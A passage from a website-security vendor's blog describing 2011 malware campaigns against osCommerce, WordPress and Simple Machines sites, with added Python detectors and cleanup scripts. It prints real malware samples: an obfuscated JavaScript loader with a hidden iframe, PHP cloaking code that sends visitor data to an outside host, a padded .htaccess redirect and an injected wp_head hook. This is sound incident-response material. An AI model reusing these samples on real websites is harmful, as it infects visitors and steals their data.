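    r'$eva1tYldokBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);'
)

ROKBOX_MARKERS = ("_0xdc8d", "refurl", "\\x63")   # the three strings the post says to grep for


def rokbox_markers_present(text):
    """True when all three markers occur in the same file, as the RokBox post advises."""
    return all(m in text for m in ROKBOX_MARKERS)


_ESC = re.compile(r'\\x([0-9A-Fa-f]{2})|\\([0-7]{1,3})')


def unescape(s):
    """Resolve \\xNN (JavaScript and PHP) and \\NNN octal (PHP) escapes to text."""
    def sub(m):
        if m.group(1) is not None:
            return chr(int(m.group(1), 16))
        return chr(int(m.group(2), 8))
    return _ESC.sub(sub, s)


_STRING_LITERAL = r'"((?:[^"\\]|\\.)*)"'


def js_string_table(js):
    """Return (array name, decoded strings) for a `var _0x....=[...]` table, the
    construct the RokBox malware uses to hide the DOM property names it touches."""
    m = re.search(r'var\s+(_0x[0-9A-Fa-f]+)\s*=\s*\[(.*?)\];', js, re.S)
    if not m:
        return None, []
    return m.group(1), [unescape(s) for s in re.findall(_STRING_LITERAL, m.group(2))]


def php_string_literals(php):
    """Decode every double-quoted PHP string literal in a fragment."""
    return [unescape(s) for s in re.findall(_STRING_LITERAL, php)]


def resolve_chr_arith(php):
    """Replace chr(<a>*<b>) with a quoted literal of the character it yields.
    PHP truncates the float product to an integer; int() does the same here."""
    def sub(m):
        return repr(chr(int(float(m.group(1)) * float(m.group(2)))))
    return re.sub(r'chr\(\s*([0-9.]+)\s*\*\s*([0-9.]+)\s*\)', sub, php)
```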

Which sites are aiding the attack?
The list below includes sites participating in the distribution of the malware thus far.

www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

Categories: News, Report, Security

Willysy Injection Attacks

December 1st, 2011

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

In this article we discuss the major outbreak of the “willysy.com” injection attacks, which at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack leads to malicious hackers injecting malicious iframes into benign websites. The iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a Lego block on your ship; the container can hold cargo from a source that you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

These exploits are used to infect benign, legitimate sites. Once the malware is injected into these exploited sites, their visitors are infected through various mechanisms used to install the malware on the visitor's machine. Some of the mechanisms used to infect the visitor's computer involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another indicator of infection is access from the IP addresses below: search your server log files for them. If you do find these IP addresses in your log files, pay special attention to determining whether your site has been compromised.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).
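
As an added example (not code from the original post), the following Python script searches page files for the two willysy signatures above and scans access log lines for the three IP addresses listed. The log lines it ships with are constructed, not real traffic, and the document-root walk assumes the usual osCommerce file types.

```python
import re
from pathlib import Path

# Indicators quoted in the post (the defanged hxxp:// prefix is not part of
# what an injected page actually contains, so only host and path are matched).
WILLYSY_SIGNATURES = [
    "willysy.com/images/banners/",
    "exero.eu/catalog/jquery.js",
]
WILLYSY_IPS = {"178.217.163.214", "178.217.165.111", "178.217.165.71"}

# Apache combined log format: client IP, then [timestamp], then "request".
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "([^"]*)"')

def scan_file_text(text):
    """Return the willysy signatures present in a page's source (case-insensitive)."""
    lowered = text.lower()
    return [sig for sig in WILLYSY_SIGNATURES if sig in lowered]

def scan_docroot(root):
    """Walk a document root and map each infected file to the signatures found in it."""
    hits = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".html", ".htm", ".js", ".tpl"}:
            try:
                found = scan_file_text(path.read_text(errors="replace"))
            except OSError:
                continue
            if found:
                hits[str(path)] = found
    return hits

def scan_access_log(lines):
    """Return (ip, timestamp, request) for every request from the listed attacker IPs."""
    suspicious = []
    for line in lines:
        m = LOG_RE.match(line)
        if m and m.group(1) in WILLYSY_IPS:
            suspicious.append((m.group(1), m.group(2), m.group(3)))
    return suspicious

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Dec/2011:10:00:01 +0000] "GET /catalog/index.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '178.217.165.71 - - [01/Dec/2011:10:02:13 +0000] "GET /catalog/index.php HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '178.217.163.214 - - [01/Dec/2011:10:02:15 +0000] "GET /catalog/product_info.php HTTP/1.1" 200 9001 "-" "Mozilla/4.0"',
]

if __name__ == "__main__":
    for ip, when, request in scan_access_log(SAMPLE_LOG):
        print(f"attacker IP seen: {ip} at {when}: {request}")
```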

Which sites are aiding the attack?
The list below includes sites used to spread the malware thus far.


Who owns these malicious sites?
The registrant for the malware distribution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…


Redirection Attacks

November 23rd, 2011

Malicious hackers are continuously changing the tactics they use to compromise websites. Over 6,600 new websites are hacked and blacklisted every day and begin distributing malware to potential customers and visitors, destroying their owner’s online reputation.

One of the primary mechanisms used to infect visitors to a website is insertion of malicious code into a file called “.htaccess”. Hackers use this mechanism to infect benign and insecure websites.

About the attack
Websites are powered by a type of software called a “web server”. There are many different web servers, including IIS, NGINX, and others, with the most popular being Apache. Many web servers have a special per-directory configuration file: on Apache this file is called “.htaccess”. This file can specify rules that determine how and to whom your website should be visible.

Using this file hackers can even redirect your visitors to another website. Sometimes before inserting the malicious code inside this file, hackers will put in a large number of empty lines to make it harder to find. Make sure to check the complete “.htaccess” file for malware, not just the lines at the top.

Where are visitors redirected?
The following malicious websites have been used in this kind of redirection attack in the past few weeks. Visitors to benign, legitimate websites that have been compromised are often redirected to the malicious websites in the list below.


How do I identify the malicious code?
Malicious code in a “.htaccess” file usually looks similar to the example below. Notice the “RewriteRule” statement that tells the web server to direct visitors to “hxxp://sokoloperkovuskeci.com/in.php” for any request to the site matching the “RewriteCond” statements.

This means visitors from many different search engines, including Ask, Google, MSN, and more, would be redirected to the malicious website.

<ifmodule>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .ask.com.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .google.$ [NC,OR]
RewriteCond %{HTTP_REFERER} .msn.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .bing.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .live.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .aol.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .altavista.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .excite.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .search.yahoo$ [NC]
RewriteRule .* hxxp://sokoloperkovuskeci.com/in.php[removed] [R,L]
</ifmodule>
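
The following Python analyzer is an added example, not code from the original post: it walks a .htaccess file, pairs each RewriteRule with the RewriteCond lines that precede it, and reports redirects (R flag) to hosts outside the site's own, including how many blank lines pad the top of the file. The sample .htaccess, its 200 lines of padding and the destination host malicious-redirect.example are constructed placeholders; own_hosts is assumed to be supplied by the administrator.

```python
import re
from urllib.parse import urlparse

# Referer fragments the post's sample keys on; used only to describe a finding.
SEARCH_ENGINE_HINTS = ("ask.com", "google", "msn", "bing", "live.com", "aol", "altavista", "excite", "yahoo")

COND_RE = re.compile(r"^\s*RewriteCond\s+(%\{[A-Z_]+\})\s+(\S+)", re.IGNORECASE)
RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.IGNORECASE)

def analyze_htaccess(text, own_hosts=()):
    """Report RewriteRules that redirect (R flag) to a host outside own_hosts.

    own_hosts: hostnames the site legitimately redirects to (caller-supplied).
    Each finding records how many preceding RewriteCond lines tested
    HTTP_REFERER, how many of those name a search engine, and how many
    blank lines pad the top of the file (the hiding trick described above).
    """
    lines = text.splitlines()
    leading_blank = next((i for i, l in enumerate(lines) if l.strip()), len(lines))
    findings, referer_conds = [], []
    for lineno, line in enumerate(lines, 1):
        cond = COND_RE.match(line)
        if cond:
            if cond.group(1).upper() == "%{HTTP_REFERER}":
                referer_conds.append(cond.group(2).lower())
            continue
        rule = RULE_RE.match(line)
        if not rule:
            continue  # blank lines, comments and non-rewrite directives
        target, flags = rule.group(2), rule.group(3) or ""
        host = urlparse(target).hostname if "://" in target else None
        flag_names = {f.strip().split("=")[0].upper() for f in flags.split(",") if f.strip()}
        if host and host not in own_hosts and "R" in flag_names:
            findings.append({
                "line": lineno,
                "target": target,
                "referer_conditions": len(referer_conds),
                "search_engine_conditions": sum(any(h in c for h in SEARCH_ENGINE_HINTS) for c in referer_conds),
                "leading_blank_lines": leading_blank,
            })
        referer_conds = []  # RewriteCond lines only apply to the next RewriteRule
    return findings

# Constructed sample: 200 blank lines of padding, then the structure of the
# post's sample with a placeholder destination host.
SAMPLE_HTACCESS = "\n" * 200 + """<IfModule mod_rewrite.c>
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo.*$ [NC]
RewriteRule .* http://malicious-redirect.example/in.php [R,L]
</IfModule>
"""
```

Run analyze_htaccess on the real file's text with own_hosts set to your own domains; a finding whose line number is far below the first directive is the padding trick at work.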

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…


Simple Machines Malware

November 8th, 2011

Simple Machines is a forum software used by thousands of website owners around the world to build online communities into their websites. Unfortunately, it is a perfect target for malicious hackers too. Finding a way to compromise the Simple Machines installation to inject malware into a legitimate website thereby infecting its visitors is an attractive proposition for malicious hackers.

This post will detail a fast-growing new strain of malware that has targeted Simple Machines enabled websites. At the time of posting, close to 30,000 websites have been infected with this malware. We detail the attack below.

The malware
This malware is primarily found in the form of a script element that contains the various commands to infect the website visitor.

Interestingly, this malware also creates an Iframe element that loads additional malware from an external website. Notice the Iframe element at the end of the sample below (this creates a link to m-e.crossfitharlem.net).

Malware sample (JavaScript):

<script>b=new function(){return 2;};try{app[1][2]}catch(q){ss="";}try{gberbger-2;}catch(q){s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd='e';if('e'==={}.asd)a=document['createTextNode']('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.
5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.
5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.
5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.
5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.
5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';n=n
['split']('a');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i]"));if(a.nodeValue==321)eval(ss);</script><iframe style="visibility:
hidden; position: absolute; left: 0pt; top: 0pt;" src="hxxp://m-e.crossfitharlem.net/z/st1" height="10" width="10"></iframe></body></html>

What does the malware do?
Malicious code (PHP) like that below has been found on the compromised websites.

The code executes in two phases:

  1. The code below transfers information (user agent, IP address, etc…) to conqstat.com.
  2. The JavaScript shown above is returned as the reply.

Malware sample (PHP):

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
[snipped...]
?>
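
To scope an incident it helps to know which visitors the cloaking check in the PHP sample above would actually have served. The Python below is an added example (not the malware and not StopTheHacker's code) that mirrors the User-Agent test from the sample and applies it to constructed access log lines; note that the sample skips anything containing “chrome”, “safari” or “opera”, so in practice mostly Internet Explorer and Firefox visitors received the payload.

```python
import re

# Substrings the PHP sample tests against the lowercased User-Agent; a request
# matching any of them is treated as a crawler or unsupported browser and skipped.
SKIPPED_UA_MARKERS = ("google", "yahoo", "baidu", "msn", "opera", "chrome", "bing", "safari", "bot")

# Apache combined log format: the User-Agent is the last quoted field.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[^"]*" \d{3} \S+ "[^"]*" "([^"]*)"')

def would_receive_payload(user_agent):
    """Mirror the sample's cloaking test: True when the visitor would get the injected JS."""
    ua = user_agent.lower()
    return not any(marker in ua for marker in SKIPPED_UA_MARKERS)

def exposed_visitors(log_lines):
    """Map each client IP to the number of page loads on which the payload would have been served."""
    exposed = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and would_receive_payload(m.group(3)):
            exposed[m.group(1)] = exposed.get(m.group(1), 0) + 1
    return exposed

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE_LOG = [
    '203.0.113.10 - - [08/Nov/2011:09:00:00 +0000] "GET /forum/index.php HTTP/1.1" 200 4321 "-" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"',
    '203.0.113.11 - - [08/Nov/2011:09:00:05 +0000] "GET /forum/index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1"',
    '198.51.100.5 - - [08/Nov/2011:09:01:00 +0000] "GET /forum/index.php HTTP/1.1" 200 4321 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"',
    '203.0.113.10 - - [08/Nov/2011:09:02:30 +0000] "GET /forum/index.php?topic=1.0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 6.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1"',
]

if __name__ == "__main__":
    for ip, n in exposed_visitors(SAMPLE_LOG).items():
        print(f"{ip}: {n} poisoned page load(s)")
```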

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…


nl.ai p,a,c,k,e,d Malware

November 7th, 2011

Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

The malware
Usually the malware shown below appears near the top of the page, in the head section of the HTML. Please check your page source.

Malware sample:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
</script>

Steps to remove the malware

  1. Access your hosting account via SSH or SFTP.
  2. Remove the malware inserted into the file “wp_inc/upd.php”, located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers!)
  3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory:

     function check_wordpress(){
     $t_d = sys_get_temp_dir();
     if(file_exists($t_d . '/wp_inc')){
     readfile($t_d . '/wp_inc');
     }
     }
     add_action('wp_head', 'check_wordpress');
     do_action( 'init' );
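
The removal in step 3 can be scripted. The Python below is an added example, not StopTheHacker's tool: it strips the injected check_wordpress() function and its wp_head hook from the text of wp-settings.php and checks for the dropper paths from step 2. The file content it ships with is a constructed excerpt. The do_action( 'init' ) line in the listing is part of a stock wp-settings.php, so the script leaves it in place.

```python
import re
from pathlib import Path

# Patterns for the two injected pieces quoted in step 3: the function body
# (one nested if block) and the wp_head hook. Whitespace and quote style may vary.
INJECTED_FUNC_RE = re.compile(
    r"function\s+check_wordpress\s*\(\s*\)\s*\{[^{}]*\{[^{}]*\}\s*\}\s*")
INJECTED_HOOK_RE = re.compile(
    r"add_action\s*\(\s*['\"]wp_head['\"]\s*,\s*['\"]check_wordpress['\"]\s*\)\s*;\s*")

def looks_infected(source):
    """True when wp-settings.php still carries either injected fragment."""
    return bool(INJECTED_FUNC_RE.search(source) or INJECTED_HOOK_RE.search(source))

def clean_wp_settings(source):
    """Strip the injected function and hook; return (cleaned_source, fragments_removed).

    The stock do_action( 'init' ) line that follows the injection in the
    listing belongs to a normal wp-settings.php and is left untouched.
    """
    cleaned, n_func = INJECTED_FUNC_RE.subn("", source)
    cleaned, n_hook = INJECTED_HOOK_RE.subn("", cleaned)
    return cleaned, n_func + n_hook

def find_dropper(tmp_dir="/tmp"):
    """Return the wp_inc dropper paths from step 2 that exist under tmp_dir."""
    candidates = [Path(tmp_dir) / "wp_inc", Path(tmp_dir) / "wp_inc" / "upd.php"]
    return [str(p) for p in candidates if p.exists()]

# Constructed excerpt (not a real wp-settings.php) with the injection in place.
SAMPLE_WP_SETTINGS = """<?php
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');
do_action( 'init' );
"""

if __name__ == "__main__":
    cleaned, removed = clean_wp_settings(SAMPLE_WP_SETTINGS)
    print(f"removed {removed} injected fragment(s); still infected: {looks_infected(cleaned)}")
    print("dropper files present:", find_dropper() or "none")
```

Back up wp-settings.php before writing the cleaned text back, and compare the result against a pristine copy from the matching WordPress release.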

What does the malware do?
The injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

Malware destination sites:

hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/

How did this happen?
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your username and passwords in your FTP client or other similar applications like FileZilla.

Additionally, make sure your WordPress install is up-to-date and that all third-party plugins, like TimThumb, are updated too.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…
